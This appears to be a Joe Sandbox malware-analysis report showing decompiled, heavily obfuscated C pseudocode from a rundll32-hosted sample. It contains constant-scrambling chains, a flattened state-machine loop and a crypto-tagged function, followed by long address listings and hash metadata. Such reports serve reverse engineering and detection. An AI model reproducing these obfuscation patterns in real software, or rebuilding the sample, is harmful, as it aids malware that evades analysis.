				_v220 = _v220 ^ 0xc89b583b;
				_t948 = 0x12;
				_v220 = _v220 / _t948;
				_v220 = _v220 ^ 0x0b283f5f;
				_v156 = 0x5af0c5;
				_v156 = _v156 + 0x13dc;
				_v156 = _v156 ^ 0x00588292;
				_v228 = 0xdd0fc1;
				_v228 = _v228 ^ 0x01435610;
				_t949 = 0x1f;
				_v228 = _v228 * 0x7e;
				_v228 = _v228 ^ 0xcbf716b5;
				_v124 = 0xd80e40;
				_v124 = _v124 ^ 0x653de0e6;
				_v124 = _v124 ^ 0x65e35353;
				_v132 = 0x5632b9;
				_v132 = _v132 + 0xffff4616;
				_v132 = _v132 ^ 0x0058fa24;
				_v204 = 0xa86aea;
				_v204 = _v204 ^ 0x5463a324;
				_v204 = _v204 + 0xffff5f95;
				_v204 = _v204 ^ 0x54cedf8e;
				_v364 = 0xe8e823;
				_v364 = _v364 + 0xffffb955;
				_v364 = _v364 + 0xffffe3ba;
				_v364 = _v364 ^ 0x9235047b;
				_v364 = _v364 ^ 0x92d6764f;
				_v280 = 0xb242c7;
				_v280 = _v280 + 0xd280;
				_v280 = _v280 | 0xe772c78b;
				_v280 = _v280 ^ 0xe7f56f66;
				_v240 = 0xa7072;
				_v240 = _v240 + 0x191d;
				_v240 = _v240 ^ 0x431e7c4c;
				_v240 = _v240 ^ 0x431912b5;
				_v104 = 0x3f68c3;
				_v104 = _v104 << 1;
				_v104 = _v104 ^ 0x00784a5e;
				_v108 = 0xb2f51d;
				_v108 = _v108 ^ 0x0119eef7;
				_v108 = _v108 ^ 0x01a6bc10;
				_v328 = 0xc750f0;
				_v328 = _v328 / _t949;
				_v328 = _v328 + 0x3c71;
				_v328 = _v328 ^ 0x000854e6;
				while(1) {
					L1:
					_t1030 = 0x5edbe80;
					_t950 = 0x530629d;
					_t878 = 0x9627218;
					do {
						while(1) {
							L2:
							_t1070 = _t927 - _t878;
							if(_t1070 <= 0) {
								break;
							}
							__eflags = _t927 - _t1058;
							if(__eflags == 0) {
								_push(_v252);
								_push(_v164);
								_push(0x341648);
								_t1059 = E0034AB66(_v236, _v244, __eflags);
								_v44 = _v368;
								_v40 = _v360;
								_v36 = _v352;
								_t883 =  *0x365c9c; // 0x0
								_t885 =  *0x365c9c; // 0x0
								_t1032 =  *0x365c9c; // 0x0
								_t887 = E00354016(_v344,  *((intOrPtr*)(_t1032 + 0x5c)), _v236, _v80, _t879, _v212, _v140, _v148, _v220, _t885 + 0x50, _v236,  &_v44, _v156,  *((intOrPtr*)(_t883 + 0x58)), _v228);
								_t1065 =  &(_t1065[0x10]);
								__eflags = _t887 - _v336;
								if(_t887 != _v336) {
									_t927 = 0x1936859;
								} else {
									_t927 = _t1053;
									_t1063 = 1;
								}
								E0034AE03(_v124, _v132, _v204, _t1059);
								L24:
								_t1030 = 0x5edbe80;
								_t950 = 0x530629d;
								_t1058 = 0xa6cb997;
								_t878 = 0x9627218;
								goto L25;
							}
							__eflags = _t927 - 0xe23336a;
							if(__eflags == 0) {
								_t927 = 0x66c3b1;
								continue;
							}
							__eflags = _t927 - _t1053;
							if(__eflags != 0) {
								goto L25;
							}
							E00347027(_v108, _v116, _v80, _v328);
							L18:
							return _t1063;
						}
						if(_t1070 == 0) {
							_push(_v308);
							_push(_v416);
							_push(0x341518);
							_t891 = E0034AB66(_v300, _v172, __eflags);
							_t1036 =  *0x365c9c; // 0x0
							__eflags = E0035FBCF(_v276, _t1036 + 0x5c, _v80, _v392, _v400, _v408, _t891, _v284, _v332, _v300,  &_v76) - _v384;
							_t927 =  ==  ? 0x530629d : _t1053;
							E0034AE03(_v260, _v268, _v376, _t891);
							_t1065 =  &(_t1065[0xe]);
							goto L24;
						}
						if(_t927 == 0x66c3b1) {
							_push(_v144);
							_push(_v84);
							_push(0x3415c8);
							_t897 = E0034AB66(_v216, _v136, __eflags);
							_push(_v388);
							_push(_v348);
							_push(0x341538);
							__eflags = E00350EDA(E0034AB66(_v232, _v272, __eflags), _v128, _v200, _t897,  &_v80, _v264, _v96) - _v324;
							_t927 =  ==  ? 0x5edbe80 : 0x7114309;
							E0034AE03(_v428, _v188, _v88, _t897);
							E0034AE03(_v424, _v180, _v316, _t898);
							_t1065 =  &(_t1065[0xf]);
							L9:
							_t1053 = 0xf59c021;
							goto L24;
						}
						if(_t927 == 0x1936859) {
							_t905 =  *0x365c9c; // 0x0
							E003468DE(_v364, _v280, _v240, _v104,  *((intOrPtr*)(_t905 + 0x58)));
							_t1065 =  &(_t1065[3]);
							_t927 = _t1053;
							while(1) {
								L1:
								_t1030 = 0x5edbe80;
								_t950 = 0x530629d;
								_t878 = 0x9627218;
								goto L2;
							}
						}
						if(_t927 == _t950) {
							_push(_t950);
							_push(_t950);
							_t967 =  *0x365c9c; // 0x0
							_t971 = E00353512( *((intOrPtr*)(_t967 + 0x5c)));
							_t911 =  *0x365c9c; // 0x0
							__eflags = _t971;
							_t927 =  !=  ? _t1058 : _t1053;
							 *((intOrPtr*)(_t911 + 0x58)) = _t971;
							goto L1;
						}
						_t1074 = _t927 - _t1030;
						if(_t927 != _t1030) {
							goto L25;
						}
						_push(_v192);
						_push(_v380);
						_push(0x341568);
						_t912 = E0034AB66(_v420, _v292, _t1074);
						_push(_v184);
						_t1055 = _t912;
						_t700 =  &_v120; // 0x784a5e
						_push( *_t700);
						_push(0x341618);
						_t913 = E0034AB66(_v356, _v196, _t1074);
						_v64 = _v176;
						_t915 = E0035BA68(_v372, _v168, _v100, _t1055, _v412);
						_v56 = _v56 & 0x00000000;
						_v60 = _t1055;
						_v52 = 1;
						_v68 = 2 + _t915 * 2;
						_v48 =  &_v68;
						_t918 = 0x20;
						_v76 = _t918;
						E00345C98(_v404, _v312, _t913, _v160,  &_v76,  &_v56, _v112, _v256,  &_v32, _t918, _v72, _v320);
						_t927 =  ==  ? 0x9627218 : 0xf59c021;
						E0034AE03(_v92, _v304, _v340, _t1055);
						E0034AE03(_v152, _v296, _v248, _t913);
						_t1065 =  &(_t1065[0x17]);
						goto L9;
						L25:
					} while (_t927 != 0x7114309);
					goto L18;
				}
			}




















































































































































                                                                                                                      0x0034cfce
                                                                                                                      0x0034cfd4
                                                                                                                      0x0034cfde
                                                                                                                      0x0034cff0
                                                                                                                      0x0034cff7
                                                                                                                      0x0034cff9
                                                                                                                      0x0034cffe
                                                                                                                      0x0034d004
                                                                                                                      0x0034d009
                                                                                                                      0x0034d00e
                                                                                                                      0x0034d016
                                                                                                                      0x0034d01e
                                                                                                                      0x0034d022
                                                                                                                      0x0034d02a
                                                                                                                      0x0034d02f
                                                                                                                      0x0034d037
                                                                                                                      0x0034d04a
                                                                                                                      0x0034d04d
                                                                                                                      0x0034d054
                                                                                                                      0x0034d05f
                                                                                                                      0x0034d06a
                                                                                                                      0x0034d075
                                                                                                                      0x0034d080
                                                                                                                      0x0034d08e
                                                                                                                      0x0034d08f
                                                                                                                      0x0034d095
                                                                                                                      0x0034d09a
                                                                                                                      0x0034d0a2
                                                                                                                      0x0034d0b8
                                                                                                                      0x0034d0bf
                                                                                                                      0x0034d0ca
                                                                                                                      0x0034d0d5
                                                                                                                      0x0034d0e0
                                                                                                                      0x0034d0eb
                                                                                                                      0x0034d0f6
                                                                                                                      0x0034d109
                                                                                                                      0x0034d10a
                                                                                                                      0x0034d111
                                                                                                                      0x0034d11c
                                                                                                                      0x0034d127
                                                                                                                      0x0034d12f
                                                                                                                      0x0034d134
                                                                                                                      0x0034d13c
                                                                                                                      0x0034d144
                                                                                                                      0x0034d14c
                                                                                                                      0x0034d157
                                                                                                                      0x0034d162
                                                                                                                      0x0034d16d
                                                                                                                      0x0034d175
                                                                                                                      0x0034d179
                                                                                                                      0x0034d17e
                                                                                                                      0x0034d186
                                                                                                                      0x0034d18e
                                                                                                                      0x0034d199
                                                                                                                      0x0034d1a4
                                                                                                                      0x0034d1af
                                                                                                                      0x0034d1b7
                                                                                                                      0x0034d1bf
                                                                                                                      0x0034d1c7
                                                                                                                      0x0034d1cf
                                                                                                                      0x0034d1d9
                                                                                                                      0x0034d1ef
                                                                                                                      0x0034d1f8
                                                                                                                      0x0034d203
                                                                                                                      0x0034d20e
                                                                                                                      0x0034d221
                                                                                                                      0x0034d224
                                                                                                                      0x0034d22b
                                                                                                                      0x0034d236
                                                                                                                      0x0034d241
                                                                                                                      0x0034d24c
                                                                                                                      0x0034d257
                                                                                                                      0x0034d262
                                                                                                                      0x0034d26d
                                                                                                                      0x0034d278
                                                                                                                      0x0034d283
                                                                                                                      0x0034d28b
                                                                                                                      0x0034d296
                                                                                                                      0x0034d2a1
                                                                                                                      0x0034d2ac
                                                                                                                      0x0034d2b7
                                                                                                                      0x0034d2c2
                                                                                                                      0x0034d2cd
                                                                                                                      0x0034d2d5
                                                                                                                      0x0034d2dd
                                                                                                                      0x0034d2e2
                                                                                                                      0x0034d2ea
                                                                                                                      0x0034d2f2
                                                                                                                      0x0034d2fa
                                                                                                                      0x0034d304
                                                                                                                      0x0034d308
                                                                                                                      0x0034d310
                                                                                                                      0x0034d318
                                                                                                                      0x0034d323
                                                                                                                      0x0034d32e
                                                                                                                      0x0034d339
                                                                                                                      0x0034d344
                                                                                                                      0x0034d35a
                                                                                                                      0x0034d369
                                                                                                                      0x0034d36a
                                                                                                                      0x0034d371
                                                                                                                      0x0034d37c
                                                                                                                      0x0034d390
                                                                                                                      0x0034d397
                                                                                                                      0x0034d3a2
                                                                                                                      0x0034d3aa
                                                                                                                      0x0034d3b2
                                                                                                                      0x0034d3b6
                                                                                                                      0x0034d3be
                                                                                                                      0x0034d3c6
                                                                                                                      0x0034d3d1
                                                                                                                      0x0034d3dc
                                                                                                                      0x0034d3e7
                                                                                                                      0x0034d3f2
                                                                                                                      0x0034d3fd
                                                                                                                      0x0034d408
                                                                                                                      0x0034d410
                                                                                                                      0x0034d418
                                                                                                                      0x0034d420
                                                                                                                      0x0034d425
                                                                                                                      0x0034d42d
                                                                                                                      0x0034d438
                                                                                                                      0x0034d440
                                                                                                                      0x0034d44b
                                                                                                                      0x0034d456
                                                                                                                      0x0034d461
                                                                                                                      0x0034d468
                                                                                                                      0x0034d473
                                                                                                                      0x0034d47b
                                                                                                                      0x0034d480
                                                                                                                      0x0034d484
                                                                                                                      0x0034d48b
                                                                                                                      0x0034d493
                                                                                                                      0x0034d49e
                                                                                                                      0x0034d4b2
                                                                                                                      0x0034d4b7
                                                                                                                      0x0034d4c0
                                                                                                                      0x0034d4cb
                                                                                                                      0x0034d4d8
                                                                                                                      0x0034d4db
                                                                                                                      0x0034d4df
                                                                                                                      0x0034d4ec
                                                                                                                      0x0034d4f0
                                                                                                                      0x0034d4f8
                                                                                                                      0x0034d503
                                                                                                                      0x0034d50e
                                                                                                                      0x0034d519
                                                                                                                      0x0034d521
                                                                                                                      0x0034d529
                                                                                                                      0x0034d531
                                                                                                                      0x0034d539
                                                                                                                      0x0034d541
                                                                                                                      0x0034d553
                                                                                                                      0x0034d558
                                                                                                                      0x0034d561
                                                                                                                      0x0034d56c
                                                                                                                      0x0034d577
                                                                                                                      0x0034d589
                                                                                                                      0x0034d58e
                                                                                                                      0x0034d597
                                                                                                                      0x0034d5a2
                                                                                                                      0x0034d5ad
                                                                                                                      0x0034d5b8
                                                                                                                      0x0034d5c3
                                                                                                                      0x0034d5cb
                                                                                                                      0x0034d5d8
                                                                                                                      0x0034d5d9
                                                                                                                      0x0034d5dd
                                                                                                                      0x0034d5e2
                                                                                                                      0x0034d5ea
                                                                                                                      0x0034d5f5
                                                                                                                      0x0034d600
                                                                                                                      0x0034d60b
                                                                                                                      0x0034d616
                                                                                                                      0x0034d61e
                                                                                                                      0x0034d629
                                                                                                                      0x0034d631
                                                                                                                      0x0034d636
                                                                                                                      0x0034d63e
                                                                                                                      0x0034d646
                                                                                                                      0x0034d64e
                                                                                                                      0x0034d656
                                                                                                                      0x0034d65b
                                                                                                                      0x0034d663
                                                                                                                      0x0034d66b
                                                                                                                      0x0034d676
                                                                                                                      0x0034d687
                                                                                                                      0x0034d68e
                                                                                                                      0x0034d699
                                                                                                                      0x0034d6a4
                                                                                                                      0x0034d6ad
                                                                                                                      0x0034d6b8
                                                                                                                      0x0034d6c3
                                                                                                                      0x0034d6d7
                                                                                                                      0x0034d6dc
                                                                                                                      0x0034d6e3
                                                                                                                      0x0034d6ee
                                                                                                                      0x0034d6f6
                                                                                                                      0x0034d6fe
                                                                                                                      0x0034d706
                                                                                                                      0x0034d70e
                                                                                                                      0x0034d724
                                                                                                                      0x0034d72b
                                                                                                                      0x0034d736
                                                                                                                      0x0034d741
                                                                                                                      0x0034d74c
                                                                                                                      0x0034d757
                                                                                                                      0x0034d762
                                                                                                                      0x0034d76a
                                                                                                                      0x0034d776
                                                                                                                      0x0034d779
                                                                                                                      0x0034d77d
                                                                                                                      0x0034d785
                                                                                                                      0x0034d78d
                                                                                                                      0x0034d798
                                                                                                                      0x0034d7a3
                                                                                                                      0x0034d7ae
                                                                                                                      0x0034d7b9
                                                                                                                      0x0034d7cf
                                                                                                                      0x0034d7d6
                                                                                                                      0x0034d7e1
                                                                                                                      0x0034d7ec
                                                                                                                      0x0034d7fe
                                                                                                                      0x0034d803
                                                                                                                      0x0034d80a
                                                                                                                      0x0034d815
                                                                                                                      0x0034d820
                                                                                                                      0x0034d831
                                                                                                                      0x0034d838
                                                                                                                      0x0034d843
                                                                                                                      0x0034d856
                                                                                                                      0x0034d85d
                                                                                                                      0x0034d868
                                                                                                                      0x0034d870
                                                                                                                      0x0034d874
                                                                                                                      0x0034d879
                                                                                                                      0x0034d87e
                                                                                                                      0x0034d886
                                                                                                                      0x0034d891
                                                                                                                      0x0034d8a4
                                                                                                                      0x0034d8ab
                                                                                                                      0x0034d8b6
                                                                                                                      0x0034d8c9
                                                                                                                      0x0034d8d0
                                                                                                                      0x0034d8d8
                                                                                                                      0x0034d8e5
                                                                                                                      0x0034d8f3
                                                                                                                      0x0034d8f8
                                                                                                                      0x0034d8fc
                                                                                                                      0x0034d904
                                                                                                                      0x0034d90c
                                                                                                                      0x0034d914
                                                                                                                      0x0034d91c
                                                                                                                      0x0034d921
                                                                                                                      0x0034d929
                                                                                                                      0x0034d92e
                                                                                                                      0x0034d936
                                                                                                                      0x0034d93e
                                                                                                                      0x0034d94d
                                                                                                                      0x0034d950
                                                                                                                      0x0034d95c
                                                                                                                      0x0034d960
                                                                                                                      0x0034d968
                                                                                                                      0x0034d978
                                                                                                                      0x0034d97c
                                                                                                                      0x0034d981
                                                                                                                      0x0034d989
                                                                                                                      0x0034d994
                                                                                                                      0x0034d9a7
                                                                                                                      0x0034d9a8
                                                                                                                      0x0034d9af
                                                                                                                      0x0034d9ba
                                                                                                                      0x0034d9c5
                                                                                                                      0x0034d9cd
                                                                                                                      0x0034d9d5
                                                                                                                      0x0034d9e0
                                                                                                                      0x0034d9e8
                                                                                                                      0x0034d9f0
                                                                                                                      0x0034d9fd
                                                                                                                      0x0034da01
                                                                                                                      0x0034da09
                                                                                                                      0x0034da14
                                                                                                                      0x0034da1b
                                                                                                                      0x0034da26
                                                                                                                      0x0034da31
                                                                                                                      0x0034da3e
                                                                                                                      0x0034da42
                                                                                                                      0x0034da52
                                                                                                                      0x0034da56
                                                                                                                      0x0034da5e
                                                                                                                      0x0034da71
                                                                                                                      0x0034da78
                                                                                                                      0x0034da83
                                                                                                                      0x0034da8e
                                                                                                                      0x0034da99
                                                                                                                      0x0034daa4
                                                                                                                      0x0034daaf
                                                                                                                      0x0034daba
                                                                                                                      0x0034dac5
                                                                                                                      0x0034dad6
                                                                                                                      0x0034dadd
                                                                                                                      0x0034dae8
                                                                                                                      0x0034daf3
                                                                                                                      0x0034dafe
                                                                                                                      0x0034db09
                                                                                                                      0x0034db14
                                                                                                                      0x0034db1f
                                                                                                                      0x0034db2c
                                                                                                                      0x0034db34
                                                                                                                      0x0034db39
                                                                                                                      0x0034db41
                                                                                                                      0x0034db46
                                                                                                                      0x0034db55
                                                                                                                      0x0034db58
                                                                                                                      0x0034db5c
                                                                                                                      0x0034db64
                                                                                                                      0x0034db7a
                                                                                                                      0x0034db81
                                                                                                                      0x0034db8c
                                                                                                                      0x0034db97
                                                                                                                      0x0034dba2
                                                                                                                      0x0034dbad
                                                                                                                      0x0034dbb8
                                                                                                                      0x0034dbc3
                                                                                                                      0x0034dbd5
                                                                                                                      0x0034dbda
                                                                                                                      0x0034dbe3
                                                                                                                      0x0034dbee
                                                                                                                      0x0034dbf9
                                                                                                                      0x0034dc04
                                                                                                                      0x0034dc0f
                                                                                                                      0x0034dc1a
                                                                                                                      0x0034dc2d
                                                                                                                      0x0034dc2e
                                                                                                                      0x0034dc35
                                                                                                                      0x0034dc40
                                                                                                                      0x0034dc4b
                                                                                                                      0x0034dc56
                                                                                                                      0x0034dc61
                                                                                                                      0x0034dc6c
                                                                                                                      0x0034dc77
                                                                                                                      0x0034dc82
                                                                                                                      0x0034dc8d
                                                                                                                      0x0034dc98
                                                                                                                      0x0034dca3
                                                                                                                      0x0034dcae
                                                                                                                      0x0034dcb6
                                                                                                                      0x0034dcbe
                                                                                                                      0x0034dcc6
                                                                                                                      0x0034dcce
                                                                                                                      0x0034dcd6
                                                                                                                      0x0034dce1
                                                                                                                      0x0034dcec
                                                                                                                      0x0034dcf7
                                                                                                                      0x0034dd02
                                                                                                                      0x0034dd0d
                                                                                                                      0x0034dd18
                                                                                                                      0x0034dd23
                                                                                                                      0x0034dd2e
                                                                                                                      0x0034dd39
                                                                                                                      0x0034dd40
                                                                                                                      0x0034dd4b
                                                                                                                      0x0034dd56
                                                                                                                      0x0034dd61
                                                                                                                      0x0034dd6c
                                                                                                                      0x0034dd7a
                                                                                                                      0x0034dd7e
                                                                                                                      0x0034dd86
                                                                                                                      0x0034dd8e
                                                                                                                      0x0034dd8e
                                                                                                                      0x0034dd8e
                                                                                                                      0x0034dd93
                                                                                                                      0x0034dd98
                                                                                                                      0x0034dd9d
                                                                                                                      0x0034dd9d
                                                                                                                      0x0034dd9d
                                                                                                                      0x0034dd9d
                                                                                                                      0x0034dd9f
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0034e0f3
                                                                                                                      0x0034e0f5
                                                                                                                      0x0034e13e
                                                                                                                      0x0034e145
                                                                                                                      0x0034e15a
                                                                                                                      0x0034e167
                                                                                                                      0x0034e16d
                                                                                                                      0x0034e178
                                                                                                                      0x0034e18a
                                                                                                                      0x0034e191
                                                                                                                      0x0034e1a8
                                                                                                                      0x0034e1ce
                                                                                                                      0x0034e1e7
                                                                                                                      0x0034e1ec
                                                                                                                      0x0034e1ef
                                                                                                                      0x0034e1f3
                                                                                                                      0x0034e1fc
                                                                                                                      0x0034e1f5
                                                                                                                      0x0034e1f7
                                                                                                                      0x0034e1f9
                                                                                                                      0x0034e1f9
                                                                                                                      0x0034e217
                                                                                                                      0x0034e21e
                                                                                                                      0x0034e21e
                                                                                                                      0x0034e223
                                                                                                                      0x0034e228
                                                                                                                      0x0034e22d
                                                                                                                      0x00000000
                                                                                                                      0x0034e22d
                                                                                                                      0x0034e0f7
                                                                                                                      0x0034e0fd
                                                                                                                      0x0034e134
                                                                                                                      0x00000000
                                                                                                                      0x0034e134
                                                                                                                      0x0034e0ff
                                                                                                                      0x0034e101
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0034e120
                                                                                                                      0x0034e129
                                                                                                                      0x0034e133
                                                                                                                      0x0034e133
                                                                                                                      0x0034dda5
                                                                                                                      0x0034e05c
                                                                                                                      0x0034e063
                                                                                                                      0x0034e075
                                                                                                                      0x0034e07a
                                                                                                                      0x0034e0a5
                                                                                                                      0x0034e0c9
                                                                                                                      0x0034e0e3
                                                                                                                      0x0034e0e6
                                                                                                                      0x0034e0eb
                                                                                                                      0x00000000
                                                                                                                      0x0034e0eb
                                                                                                                      0x0034ddb1
                                                                                                                      0x0034df96
                                                                                                                      0x0034df9d
                                                                                                                      0x0034dfb2
                                                                                                                      0x0034dfb7
                                                                                                                      0x0034dfbc
                                                                                                                      0x0034dfc2
                                                                                                                      0x0034dfd4
                                                                                                                      0x0034e01a
                                                                                                                      0x0034e034
                                                                                                                      0x0034e037
                                                                                                                      0x0034e04f
                                                                                                                      0x0034e054
                                                                                                                      0x0034df22
                                                                                                                      0x0034df22
                                                                                                                      0x00000000
                                                                                                                      0x0034df22
                                                                                                                      0x0034ddbd
                                                                                                                      0x0034df66
                                                                                                                      0x0034df87
                                                                                                                      0x0034df8c
                                                                                                                      0x0034df8f
                                                                                                                      0x0034dd8e
                                                                                                                      0x0034dd8e
                                                                                                                      0x0034dd8e
                                                                                                                      0x0034dd93
                                                                                                                      0x0034dd98
                                                                                                                      0x00000000
                                                                                                                      0x0034dd98
                                                                                                                      0x0034dd8e
                                                                                                                      0x0034ddc5
                                                                                                                      0x0034df3e
                                                                                                                      0x0034df3f
                                                                                                                      0x0034df40
                                                                                                                      0x0034df50
                                                                                                                      0x0034df54
                                                                                                                      0x0034df59
                                                                                                                      0x0034df5b
                                                                                                                      0x0034df5e
                                                                                                                      0x00000000
                                                                                                                      0x0034df5e
                                                                                                                      0x0034ddcb
                                                                                                                      0x0034ddcd
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0034ddd3
                                                                                                                      0x0034ddda
                                                                                                                      0x0034dde9
                                                                                                                      0x0034ddee
                                                                                                                      0x0034ddf3
                                                                                                                      0x0034ddfa
                                                                                                                      0x0034ddfc
                                                                                                                      0x0034ddfc
                                                                                                                      0x0034de0e
                                                                                                                      0x0034de13
                                                                                                                      0x0034de25
                                                                                                                      0x0034de3f
                                                                                                                      0x0034de46
                                                                                                                      0x0034de4e
                                                                                                                      0x0034de5c
                                                                                                                      0x0034de67
                                                                                                                      0x0034de75
                                                                                                                      0x0034de7c
                                                                                                                      0x0034de84
                                                                                                                      0x0034decc
                                                                                                                      0x0034def5
                                                                                                                      0x0034deff
                                                                                                                      0x0034df1a
                                                                                                                      0x0034df1f
                                                                                                                      0x00000000
                                                                                                                      0x0034e232
                                                                                                                      0x0034e232
                                                                                                                      0x00000000
                                                                                                                      0x0034e23e

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8s$#$*>@$.v:$/$0aQX$R5o$SSe$SN$^JxL$fFV$q<$rp$A@
                                                                                                                      • API String ID: 0-3270405876
                                                                                                                      • Opcode ID: 502d0a9b5dc174be65b3efff4b01a5a9e32c485e4bb8bccec3db4fb19bc212e0
                                                                                                                      • Instruction ID: 1780dd2b739d524fa675609515fb0386da8083a83cdc2cc5bd617de2fe6baf39
                                                                                                                      • Opcode Fuzzy Hash: 502d0a9b5dc174be65b3efff4b01a5a9e32c485e4bb8bccec3db4fb19bc212e0
                                                                                                                      • Instruction Fuzzy Hash: 7392E1715093808FD3B9CF65C58AB8BBBE2FBC5304F10891DE59A8A260DBB19549CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00356864 Relevance: 16.8, Strings: 13, Instructions: 566COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E00356864(char __ecx, signed int __edx) {
				char _v128;
				char _v256;
				char _v288;
				signed int _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				unsigned int _v380;
				unsigned int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				unsigned int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				char _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				unsigned int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _t574;
				signed int _t578;
				signed int _t583;
				void* _t604;
				void* _t614;
				signed int _t616;
				int _t621;
				signed int _t623;
				signed int _t624;
				signed int _t628;
				intOrPtr* _t633;
				void* _t636;
				void* _t637;
				void* _t638;
				signed int _t654;
				void* _t686;
				void* _t687;
				signed int _t689;
				signed int _t703;
				signed int _t704;
				signed int _t705;
				signed int _t706;
				signed int _t707;
				signed int _t708;
				signed int _t709;
				signed int _t710;
				signed int _t711;
				signed int _t712;
				signed int _t713;
				signed int _t714;
				signed int _t715;
				void* _t719;
				void* _t722;
				void* _t723;
				void* _t724;
				signed int _t729;
				signed int* _t730;
				void* _t736;

				_t730 =  &_v536;
				_v312 = __edx;
				_v488 = __ecx;
				_v292 = _v292 & 0x00000000;
				_v304 = 0xafedb;
				_v300 = 0x161b15;
				_v296 = 0xc4991c;
				_v520 = 0x229c01;
				_v520 = _v520 * 0x5c;
				_t723 = 0xff9e75d;
				_v520 = _v520 + 0xffff9f66;
				_t703 = 0xc;
				_v520 = _v520 / _t703;
				_v520 = _v520 ^ 0x01094ea5;
				_v532 = 0xceed0e;
				_v532 = _v532 << 3;
				_v532 = _v532 | 0xe74d27fb;
				_v532 = _v532 ^ 0xe772d72f;
				_v476 = 0xc446fa;
				_v476 = _v476 + 0xf6e0;
				_v476 = _v476 + 0x4782;
				_v476 = _v476 + 0xffffecbc;
				_v476 = _v476 ^ 0x00cc0886;
				_v336 = 0x190970;
				_t704 = 0x2e;
				_v336 = _v336 * 0x68;
				_v336 = _v336 ^ 0x0a2923c5;
				_v328 = 0x78e0eb;
				_v328 = _v328 + 0x488f;
				_v328 = _v328 ^ 0x00799c70;
				_v344 = 0x81e0f6;
				_v344 = _v344 << 5;
				_v344 = _v344 ^ 0x103feee2;
				_v468 = 0xdaa1d;
				_v468 = _v468 * 0x7d;
				_v468 = _v468 + 0xfffff9ad;
				_v468 = _v468 >> 0xb;
				_v468 = _v468 ^ 0x0000a0f1;
				_v500 = 0x314529;
				_t62 =  &_v500; // 0x314529
				_v500 =  *_t62 * 0x2f;
				_t64 =  &_v500; // 0x314529
				_v500 =  *_t64 * 0x58;
				_v500 = _v500 ^ 0x606cc451;
				_v500 = _v500 ^ 0x7c6b32c1;
				_v452 = 0xb84a45;
				_v452 = _v452 + 0x7128;
				_t705 = 0x77;
				_v452 = _v452 / _t704;
				_v452 = _v452 ^ 0x000855d5;
				_v320 = 0x670f1a;
				_v320 = _v320 + 0xc1b0;
				_v320 = _v320 ^ 0x00622c3e;
				_v528 = 0x36f841;
				_v528 = _v528 | 0xd9d6132d;
				_v528 = _v528 + 0xffff776d;
				_v528 = _v528 << 0xd;
				_v528 = _v528 ^ 0xce5fe5c5;
				_v444 = 0x9c7682;
				_v444 = _v444 ^ 0x90589f65;
				_v444 = _v444 * 0x27;
				_v444 = _v444 ^ 0x0df55b42;
				_v512 = 0x104d73;
				_v512 = _v512 / _t705;
				_v512 = _v512 ^ 0x3e9257a1;
				_v512 = _v512 | 0xb9bbbc7d;
				_v512 = _v512 ^ 0xbfb4ec53;
				_v428 = 0xbc5642;
				_v428 = _v428 ^ 0xe7847a8c;
				_t706 = 0x55;
				_v428 = _v428 * 0x7f;
				_v428 = _v428 ^ 0xb4dd412b;
				_v436 = 0x8f794f;
				_v436 = _v436 << 9;
				_v436 = _v436 / _t706;
				_v436 = _v436 ^ 0x00567a69;
				_v496 = 0x46853b;
				_v496 = _v496 + 0xffff90ed;
				_v496 = _v496 >> 5;
				_t707 = 0x67;
				_v496 = _v496 / _t707;
				_v496 = _v496 ^ 0x000cc5d9;
				_v372 = 0xd1254b;
				_v372 = _v372 << 7;
				_v372 = _v372 ^ 0x689f86f2;
				_v504 = 0x5d1a6;
				_v504 = _v504 + 0xffffc3f1;
				_v504 = _v504 ^ 0x7853fb4b;
				_v504 = _v504 | 0x0811a454;
				_v504 = _v504 ^ 0x78557827;
				_v376 = 0x40c0d3;
				_v376 = _v376 + 0xba7b;
				_v376 = _v376 ^ 0x0043f819;
				_v448 = 0x188995;
				_v448 = _v448 ^ 0x19c6d723;
				_v448 = _v448 + 0xffff6508;
				_v448 = _v448 ^ 0x19d0df3a;
				_v368 = 0xa08e58;
				_v368 = _v368 | 0xc4b17aa1;
				_v368 = _v368 ^ 0xc4b81ac3;
				_v492 = 0x5a5e24;
				_v492 = _v492 ^ 0x14ae01a0;
				_v492 = _v492 + 0xffffeac5;
				_v492 = _v492 + 0xffff378f;
				_v492 = _v492 ^ 0x14f310c0;
				_v460 = 0x25665c;
				_v460 = _v460 << 9;
				_v460 = _v460 + 0xb06;
				_v460 = _v460 + 0x6999;
				_v460 = _v460 ^ 0x4ac4129f;
				_v316 = 0x9c2147;
				_v316 = _v316 | 0xf1f8cc6e;
